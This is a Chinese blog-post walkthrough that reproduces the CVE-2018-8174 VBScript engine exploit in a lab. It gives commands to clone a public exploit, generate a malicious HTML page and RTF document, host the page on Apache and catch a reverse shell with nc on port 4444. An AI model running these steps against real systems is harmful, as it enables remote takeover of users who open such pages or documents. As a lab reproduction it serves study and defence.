码迷,mamicode.com
首页 > 其他好文 > 详细

双杀 0day 漏洞(CVE-2018-8174)复现

时间:2018-06-13 00:16:24      阅读:903      评论:0      收藏:0      [点我收藏+]

标签:start   AC   window   文档   apach   项目   var   hub   engine   

漏洞描述:

CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。

微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174

由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

漏洞复现:

攻击机 IP:192.168.220.160

靶机 IP:192.168.220.161

项目地址:https://github.com/Sch01ar/CVE-2018-8174_EXP

┌─[root@sch01ar]─[/sch01ar]
└──? #git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

ls 看一下

技术分享图片

生成带有恶意 VBscript 的 html 页面和 word 文档

┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP]
└──? #python CVE-2018-8174.py -u http://192.168.220.160/exploit.html -o msf.rtf -i 192.168.220.160 -p 4444

-u:URL 地址

-o:生成文档

-i:监听地址

-p:监听端口

技术分享图片

查看一下生成的文件

技术分享图片

把 explot.html 复制到 /var/www/html,并开启 apache 服务

┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP]
└──? #cp exploit.html /var/www/html
┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP]
└──? #service apache2 start

用 nc 监听 4444 端口

技术分享图片

用靶机的 IE 浏览器打开恶意 URL

技术分享图片

攻击机收到靶机的 shell 会话

技术分享图片

在靶机用 word 打开 msf.rtf

技术分享图片

攻击机同样也收到会话

技术分享图片

 

双杀 0day 漏洞(CVE-2018-8174)复现

标签:start   AC   window   文档   apach   项目   var   hub   engine   

原文地址:https://www.cnblogs.com/sch01ar/p/9175578.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!